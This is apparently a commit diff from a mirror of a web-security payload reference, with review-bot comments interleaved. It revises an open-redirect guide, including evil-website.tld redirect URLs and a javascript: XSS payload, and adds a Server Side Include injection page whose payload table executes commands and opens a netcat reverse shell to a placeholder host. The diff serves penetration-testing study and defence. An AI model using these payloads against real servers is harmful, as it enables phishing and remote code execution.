mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Open Redirect + SSI Injection
This commit is contained in:
parent
86e246dd03
commit
b68ce28c4b
3 changed files with 72 additions and 41 deletions
@ -4,53 +4,62 @@
## Summary
- [Open URL Redirection](#open-url-redirection)
- [Summary](#summary)
- [Exploitation](#exploitation)
- [HTTP Redirection Status Code - 3xx](#http-redirection-status-code---3xx)
- [Fuzzing](#fuzzing)
- [Filter Bypass](#filter-bypass)
- [Common injection parameters](#common-injection-parameters)
- [References](#references)
* [Labs](#labs)
* [Exploitation](#exploitation)
* [HTTP Redirection Status Code](#http-redirection-status-code)
* [Fuzzing](#fuzzing)
* [Filter Bypass](#filter-bypass)
* [Common injection parameters](#common-injection-parameters)
* [References](#references)


## Labs
* [Root Me - HTTP - Open redirect](https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-Open-redirect)
* [PortSwigger - DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection)


## Exploitation
Let’s say there’s a `well known` website - https://famous-website.tld/. And let's assume that there's a link like :
An open redirect vulnerability occurs when a web application or server uses unvalidated, user-supplied input to redirect users to other sites. This can allow an attacker to craft a link to the vulnerable site which redirects to a malicious site of their choosing.
```powershell
https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account
```
After signing up you get redirected to your account, this redirection is specified by the `redirectUrl` parameter in the URL.
What happens if we change the `famous-website.tld/account` to `evil-website.tld`?
Attackers can leverage this vulnerability in phishing campaigns, session theft, or forcing a user to perform an action without their consent.
```powershell
https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account
Consider this example:
Your web application has a feature that allows users to click on a link and be automatically redirected to a saved preferred homepage. This might be implemented like so:
```ps1
https://example.com/redirect?url=https://userpreferredsite.com
```
By visiting this url, if we get redirected to `evil-website.tld` after the sign-up, we have an Open Redirect vulnerability. This can be abused by an attacker to display a phishing page asking you to enter your credentials.
An attacker could exploit an open redirect here by replacing the `userpreferredsite.com` with a link to a malicious website. They could then distribute this link in a phishing email or on another website. When users click the link, they're taken to the malicious website.


## HTTP Redirection Status Code - 3xx
## HTTP Redirection Status Code
HTTP Redirection status codes, those starting with 3, indicate that the client must take additional action to complete the request. Here are some of the most common ones:
- [300 Multiple Choices](https://httpstatuses.com/300) - This indicates that the request has more than one possible response. The client should choose one of them.
- [301 Moved Permanently](https://httpstatuses.com/301) - This means that the resource requested has been permanently moved to the URL given by the Location headers. All future requests should use the new URI.
- [302 Found](https://httpstatuses.com/302) - This response code means that the resource requested has been temporarily moved to the URL given by the Location headers. Unlike 301, it does not mean that the resource has been permanently moved, just that it is temporarily located somewhere else.
- [303 See Other](https://httpstatuses.com/303) - The server sends this response to direct the client to get the requested resource at another URI with a GET request.
- [304 Not Modified](https://httpstatuses.com/304) - This is used for caching purposes. It tells the client that the response has not been modified, so the client can continue to use the same cached version of the response.
- [305 Use Proxy](https://httpstatuses.com/305) - The requested resource must be accessed through a proxy provided in the Location header.
- [307 Temporary Redirect](https://httpstatuses.com/307) - This means that the resource requested has been temporarily moved to the URL given by the Location headers, and future requests should still use the original URI.
- [308 Permanent Redirect](https://httpstatuses.com/308) - This means the resource has been permanently moved to the URL given by the Location headers, and future requests should use the new URI. It is similar to 301 but does not allow the HTTP method to change.
- [300 Multiple Choices](https://httpstatuses.com/300)
- [301 Moved Permanently](https://httpstatuses.com/301)
- [302 Found](https://httpstatuses.com/302)
- [303 See Other](https://httpstatuses.com/303)
- [304 Not Modified](https://httpstatuses.com/304)
- [305 Use Proxy](https://httpstatuses.com/305)
- [307 Temporary Redirect](https://httpstatuses.com/307)
- [308 Permanent Redirect](https://httpstatuses.com/308)
## Fuzzing
Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
Replace `www.whitelisteddomain.tld` from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL.
To do this simply modify the `WHITELISTEDDOMAIN` with value `www.test.com `to your test case URL.
```powershell
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
```


## Filter Bypass
Using a whitelisted domain or keyword
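Review bot: the rewritten Fuzzing sentence has a broken inline-code span: `` `www.test.com `to `` puts the closing backtick after a trailing space and glues it to the next word, so it should read `` `www.test.com` to ``; "white listed" in the rewritten line above it should also be "whitelisted" to match the rest of the section. The annotated 3xx list and the bare one both appear in this hunk, so one is replacing the other; make sure the fact that 307 and 308 forbid changing the HTTP method (unlike 302 and 303) survives in some form, since that is the detail that matters when judging what a redirect sink can be made to do. Nit: the new example URL is fenced as ```ps1 although it is a bare URL, not PowerShell.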
@ -149,6 +158,7 @@ XSS from javascript:// wrapper
http://www.example.com/redirect.php?url=javascript:prompt(1)
```


## Common injection parameters
```powershell
@ -178,17 +188,13 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
?continue={payload}
?return_path={payload}
```
## Labs
* [DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection)


## References
* filedescriptor
* [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/)
* [Open-Redirect-Payloads - cujanovic](https://github.com/cujanovic/Open-Redirect-Payloads)
* [Host/Split Exploitable Antipatterns in Unicode Normalization - BlackHat US 2019](https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf)
* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/)
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
* [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)
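Review bot: the References list is re-sorted alphabetically and the bare `filedescriptor` entry (a name with no link) is dropped, which is fine, but the OWASP entry still points at the retired `www.owasp.org/index.php/...` wiki URL; the Unvalidated Redirects and Forwards Cheat Sheet now lives on cheatsheetseries.owasp.org, so update the link while the list is being touched. The `## Labs` block removed here reappears at the top of the file in the first hunk, so no content is lost.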
Server Side Include Injection/README.md (Normal file, 25 lines)
@ -0,0 +1,25 @@
# Server Side Include Injection
> Server Side Includes (SSI) are directives that are placed in HTML pages and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.


## Summary
* [Payloads](#payloads)
* [References](#references)


## Payloads
| Description | Payload |
|-------------------------|---------|
| Print a date | `<!--#echo var="DATE_LOCAL" -->` |
| Print all the variables | `<!--#printenv -->` |
| Include a file | `<!--#include file="includefile.html" -->` |
| Execute commands | `<!--#exec cmd="ls" -->` |
| Doing a reverse shell | `<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->` |


## References
* [Server-Side Includes (SSI) Injection - OWASP](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)
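Review bot: the opening blockquote is taken almost verbatim from the Apache httpd "Introduction to Server Side Includes" tutorial, but the References section cites only the OWASP attack page; add the Apache documentation as the source of the quote. The file also carries no hardening note: on Apache the `#exec` directive, and with it the "Execute commands" and "Doing a reverse shell" rows of the table, is disabled by `Options IncludesNOEXEC`, which is worth one line next to the payload table so readers know what a safe configuration looks like and what to check for when the `#exec` payloads fail.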
@ -4,8 +4,8 @@
* [Tools](#tools)
* [Exploit](#exploit)
* [Methodology - Caching Sensitive Data](#methodology---caching-sensitive-data)
* [Methodology - Caching Custom JavaScript](#methodology---caching-custom-javascript)
* [Methodology - Caching Sensitive Data](#methodology---caching-sensitive-data)
* [Methodology - Caching Custom JavaScript](#methodology---caching-custom-javascript)
* [CloudFlare Caching](#cloudflare-caching)
* [Labs](#labs)
* [References](#references)
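Review bot: the removed and re-added Methodology entries are textually identical in this view, so the change can only be the leading indentation (lost in the rendering) that nests them under `Exploit`; that matches the `##` to `###` demotion of the same two headings in the hunks below, and since the anchors `#methodology---caching-sensitive-data` and `#methodology---caching-custom-javascript` do not depend on heading level, the links still resolve.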
@ -25,7 +25,7 @@
5. Under the cache directory, the proxy creates a directory named home.php, and caches the imposter "CSS" file (non-existent.css) inside.


## Methodology - Caching Sensitive Data
### Methodology - Caching Sensitive Data
**Example 1** - Web Cache Deception on PayPal Home Page
1. Normal browsing, visit home : `https://www.example.com/myaccount/home/`
@ -45,7 +45,7 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
5. Attacker harvests JWT Credentials.


## Methodology - Caching Custom JavaScript
### Methodology - Caching Custom JavaScript
1. Find an un-keyed input for a Cache Poisoning
```js